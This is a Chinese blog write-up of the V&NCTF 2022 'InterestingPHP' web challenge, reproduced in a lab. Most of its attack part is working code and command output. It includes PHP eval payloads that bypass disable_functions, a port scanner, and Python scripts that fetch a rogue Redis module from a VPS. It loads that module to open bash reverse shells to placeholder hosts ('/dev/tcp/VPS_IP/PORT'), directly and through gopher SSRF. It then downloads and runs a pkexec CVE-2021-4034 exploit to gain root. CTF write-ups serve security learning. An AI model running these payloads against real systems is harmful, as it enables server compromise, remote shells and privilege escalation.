[V&NCTF 2022]InterestingPHP

最新推荐文章于 2023-12-06 11:24:34 发布
最新推荐文章于 2023-12-06 11:24:34 发布
阅读量1k 收藏
点赞数 1
分类专栏: ctf 文章标签: php 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122999945
版权

1NDEX

0x00 前言

比赛时候外出 回来复现了
只有4个人出 看来是挺难
贴一下源码
就知道没那么简单

<?php highlight_file(__FILE__); @eval($_GET['exp']);?>

0x01 brain.md

一开始试了几个发现都被ban了
连phpinfo都用不了…
扩展新函数

ini_get_all

  • (PHP 4 >= 4.2.0, PHP 5, PHP 7, PHP 8)

    ini_get_all — 获取所有配置选项

    说明 ¶ ini_get_all(string $extension = ?, bool $details = true): array
    获取所有已注册的配置选项

get_cfg_var

  • (PHP 4, PHP 5, PHP 7, PHP 8)

    get_cfg_var — 获取 PHP 配置选项的值

    说明 get_cfg_var(string $option): mixed 获取 PHP 配置选项 option 的值。

    此函数不会返回 PHP 编译的配置信息,或从 Apache 配置文件读取。

    检查系统是否使用了一个配置文件,并尝试获取 cfg_file_path 的配置设置的值。 如果有效,将会使用一个配置文件。

dump出来 or var_dump(get_cfg_var(xxx))
太长就不贴了 我们需要注意的部分有disable_function、disable_class、open_basedir
在这里插入图片描述
disable_function

[“disable_functions”]=> array(3) { [“global_value”]=> string(816) “include,include_once,require,require_once,stream_get_contents,fwrite,readfile,file_get_contents,fread,fgets,fgetss,file,parse_ini_file,show_source,fsockopen,proc_open,ini_set,pfsockopen,ini_alter,ini_get,posix_kill,phpinfo,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,passthru,symlink,link,syslog,imap_open,dl,mail,stream_socket_client,error_log,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,get_cfg_var” [“local_value”]=> string(816) “include,include_once,require,require_once,stream_get_contents,fwrite,readfile,file_get_contents,fread,fgets,fgetss,file,parse_ini_file,show_source,fsockopen,proc_open,ini_set,pfsockopen,ini_alter,ini_get,posix_kill,phpinfo,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,passthru,symlink,link,syslog,imap_open,dl,mail,stream_socket_client,error_log,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,get_cfg_var” [“access”]=> int(4) }

可以看到大多数都被ban了 好消息是file_put_contents还在
这也解释了为什么蚁剑虽然能连接上写的webshell,但虚拟终端无法执行命令
并且不能直接用蚁剑写文件(判断蚁剑用shell操作的函数都被ban了
但连接后凑巧看到了当前目录(exp和1都是后来自己写的)
在这里插入图片描述
想到rdb应该是突破口了
down下来 redis数据备份文件
猜测ye_w4nt_a_gir1fri3nd其为密码

REDIS0008� redis-ver4.0.9�
redis-bits�@�ctime³��a�used-mem€� � aof-preamble� � � sercetye_w4nt_a_gir1fri3nd��nR�K��S

redis rdb文件格式详解

然后就需要探测redis服务端口了
学习赵总WMCTF的wp
WMCTF2021-Web-Make PHP Great Again And Again WriteUp

探测服务端开放端口
http://270bf8f2-a616-4282-9e0e-f86ec36a110b.node4.buuoj.cn:81/?exp=eval($_POST[a]);

for($i=0;$i<65535;$i++) {
  $t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
  if($ee2 === "Address already in use") {
    var_dump($i);
  }
}

在这里插入图片描述
或者

/?exp=eval(file_put_contents("1.php",base64_decode($_POST['a'])));
POST:
a=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwojIFBvcnQgc2Nhbgpmb3IoJGk9MDskaTw2NTUzNTskaS
srKSB7CiAgJHQ9c3RyZWFtX3NvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaW
YoJGVlMiA9PT0gIkFkZHJlc3MgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9Cg==

注:使用接口调试插件或base64编码进行传输,避免换行符等在参数传输时出错!!

stream_socket_server

(PHP 5, PHP 7, PHP 8)

stream_socket_server — Create an Internet or Unix domain server socket

说明 ¶

stream_socket_server(
    string $address,
    int &$error_code = null,
    string &$error_message = null,
    int $flags = STREAM_SERVER_BIND | STREAM_SERVER_LISTEN,
    ?resource $context = null
): resource|false

Creates a stream or datagram socket on the specified address.

This function only creates a socket, to begin accepting connections use stream_socket_accept().
EG:

<?php
$socket = stream_socket_server("tcp://0.0.0.0:8000", $errno, $errstr);
if (!$socket) {
  echo "$errstr ($errno)<br />\n";
} else {
  while ($conn = stream_socket_accept($socket)) {
    fwrite($conn, 'The local time is ' . date('n/j/Y g:i a') . "\n");
    fclose($conn);
  }
  fclose($socket);
}
?>

从而知晓redis端口8888

get_loaded_extensions()

返回所有编译并加载模块名的 array
var_dump出来看到有redis(redis.so)

redis module load rce

https://xz.aliyun.com/t/5665#toc-16

先用file_put_contents写入恶意so文件

https://github.com/n0b0dyCN/redis-rogue-server

远程down文件尽量使用py

import requests

url = "http://270bf8f2-a616-4282-9e0e-f86ec36a110b.node4.buuoj.cn/?exp=eval($_POST[0]);"
headers = {"content-type": "application/x-www-form-urlencoded"}
pay = "http://xxx(vps)/exp.so"
payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);

            curl_close($ch);
            file_put_contents("exp.so",$result);
      }

      Curl("''' + pay + '''");
'''.strip()

data = {
    0: payload
}
r = requests.post(url, data, headers=headers).text
print(r)

CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。

然后两种姿势module load 反弹shell

官方wp直接通过redis类执行命令

Redis类中有 rawCommand() ⽅法可以执⾏redis的命令操作

$redis = new Redis();
$redis->connect('127.0.0.1',8888);
$redis->auth('ye_w4nt_a_gir1fri3nd');
$redis->rawCommand('module','load','/var/www/html/exp.so');
$redis->rawCommand("system.exec","bash -c 'exec bash -i &>/dev/tcp/VPS_IP/PORT <&1'");

在这里插入图片描述

利用gopher ssrf
import requests
from urllib import parse


url = "http://270bf8f2-a616-4282-9e0e-f86ec36a110b.node4.buuoj.cn/?exp=eval($_POST[0]);"
headers = {"content-type":"application/x-www-form-urlencoded"}

pay="""auth ye_w4nt_a_gir1fri3nd
module load ./exp.so
system.exec 'bash -c "bash -i >& /dev/tcp/vps_ip/7777 0>&1"'
quit
""".replace('\n','\r\n')

payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);
            curl_close($ch);
            if($result!=''){
            echo $result;
            }
            
        } 
        Curl("gopher://127.0.0.1:8888/_'''+parse.quote(pay)+'''");
        '''

data = {
    0:payload
}

r = requests.post(url,data=data,headers=headers).text
print(r)

拿到shell后发现无权限
在这里插入图片描述
suid提权 --> pkexec提权

https://github.com/arthepsy/CVE-2021-4034.git

www-data@out:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
www-data@out:~/html$
www-data@out:~/html$ wget
wget
bash: wget: command not found
www-data@out:~/html$ curl xxx:888/cve-2021-4034-poc -o ./poc
curl xxx:888/cve-2021-4034-poc -o ./poc
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16296  100 16296    0     0   274k      0 --:--:-- --:--:-- --:--:--  279k
www-data@out:~/html$ ls
ls
exp.so
index.php
poc
secret.rdb
www-data@out:~/html$ ./poc
./poc
bash: ./poc: Permission denied
www-data@out:~/html$ chmod +x ./poc
chmod +x ./poc
www-data@out:~/html$ ./poc
./poc
whoami
root
cat /flag
flag{5c08372f-6b1c-4c31-97ff-2d5721369f49}

参考文章

https://blog.csdn.net/jvkyvly/article/details/122913401

k_du1t
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
H&NCTF 2024 Re 全解WP(带附件加详细解析)
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
最新发布
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
蚁剑连接虚拟终端执行命令返回结果为ret=-1
bgsnnzy的博客
10-31 922
检查网络连接:确保你的本地网络连接正常工作,可以尝试通过其他方式连接到目标主机,例如使用命令行工具进行连接。检查远程主机服务状态:确认目标主机必要的服务(如 SSH 或 Telnet)是否已启动并正在运行。检查目标主机的防火墙设置:如果目标主机上运行了防火墙软件,确保正确配置允许蚁剑的连接请求通过。确保远程主机的连接信息正确:检查目标主机的IP地址、端口号、用户名和密码是否正确输入或配置。检查蚁剑版本和插件:确保你使用的是最新版本的蚁剑,并根据需要安装必要的插件。
解决蚁剑连接本地的问题
rev1ve的博客
12-06 366
记录一次在本地用docker复现题目时,出现蚁剑连接不上问题。
中国蚁剑 配置使用
Z_l123的博客
01-13 5801
1.编写一句话木马,并命名为muma.php 2.利用靶机的文件上传漏洞,将此木马文件( Webshell )上传至靶机 1)打开dvwa网站 2)成功登录DVWA网站后,在网站主页左侧菜单选择 DVWA Security,将网站的安全级别设置为"Low": 3)在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径: 3.利用"中国蚁剑"连接靶机上的 muma.php 1)打开中国蚁剑 2)在
代码执行漏洞 + antsword(蚁剑)调试应用
weixin_47306547的博客
09-12 2872
代码执行漏洞概述 概念:代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。类似我们常见的SQL注入,是将SQL语句带入数据库查询,而我们的代码注入,则是将代码注入到脚本中让应用对代码进行解析,其危害直接相当于一个WEB后门的存在!远程代码执行实际上就是调用服务器网站代码进行执行。 代码执行漏洞成因 由于服务端存在执行的函数,在使用的过程中没有做好一个严格的控制,造成了实际的参数在客户端中可控 代码执行漏洞的危害 执行任意代码 向网站写WebS
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
提权,远程连接控制目标。
qq_57663276的博客
09-15 888
未知攻,何来防。网络安全靶场学习:提权,远程连接控制目标。
绕过disable_functions
unexpectedthing的博客
04-28 2234
文章目录前言黑名单绕过利用 LD_PRELOAD 环境变量LD_PRELOAD 简介利用条件劫持 getuid()劫持启动进程演示过程利用ShellShock(CVE-2014-6271)使用条件:原理简述演示过程php-json-bypass使用条件:原理简述利用脚本演示过程php-GC-bypass使用条件:原理简述利用脚本演示过程利用 Backtrace使用条件:原理简述利用脚本利用方法利用 Apache Mod CGI使用条件:原理简述演示过程2020De1CTF通过攻击 PHP-FPM理论:ctf
红日(vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1642
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
【红日内网打靶记录】红日3打靶(下)
weixin_54603520的博客
05-19 379
注意:蚁剑连接后无法执行命令时因为系统设置了函数黑名单,这里使用的时bypass插件去继续进行,我们也可以考虑使用哥斯拉或者蚁剑,因为这两个工具的传输是加密的,应该是可以直接执行命令的。这里发现查询到的ip并不是我们拿下的机器的IP,应该是什么软件流量代理造成的。所以我们这里查询出来的结果是其他端口。这里成功执行,并且帮我们创建了一个新的账号,我们可以直接设置密码,重新登录达到提权的目的。查询当前拿下的机器网络连接情况,这里发现了一个与其建立连接的机器,应该是通过93.100的机器去做代理的。
PHP页面被加入eval(base64_decode后门怎么办
weixin_34290631的博客
08-13 1234
1. 空间下站点所有的php文件头部都被加了“eval(base64_decode”这么一段,不论用的是什么程序(有dede,有wp,有zencart)。访问网站时会弹出什么你的电脑有问题,要用注册表啦,然后不停的弹出扫描窗口要你付费购买或者就是一片空白什么都没有。 2. 手动清除index.php里的这段代码后,过几个小时他又会自动出来。 3. index.php文件的...
蚁剑常见报错
m0_62905261的博客
07-27 2907
蚁剑常见报错
NCTF2022 calc题目复现
m0_62422842的博客
12-10 1121
这都是在基于system函数执行的条件下(无论是php还是python),底层调用sh二进制文件,我们都可以注入环境变量来rce。换句话说,如果底层调用了sh -c命令的函数执行的话,具有环境变量注入条件,使用这个方法来getshell应该是可以的。这个赛题个人感觉质量很高,能够从中学习到很多知识。
蚁剑一直报错怎么办(适合从未链接成功的人观看)
m0_63745032的博客
10-04 949
蚁剑各种报错除了其他人说的,还有一个被他们忽略掉的问题,那就是win系统下安全中心,在每次把蚁剑加载器解压出来的时候,win安全中心都会进行拦截并自动隔离,这个时候你需要点开,允许执行此操作,反复删除解压几次,一定要记得每次都允许执行,然后再次打开应该就没什么问题了。3.然后打开AntSword-Loader-v4.0.3-win32-x64里面的exe文件,这个时候会提示你让你选个文件夹初始化,选择文件夹到antSword-master这个文件夹下即可。作为刚开始接触的新人,蚁剑一直各种报错怎么办?
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值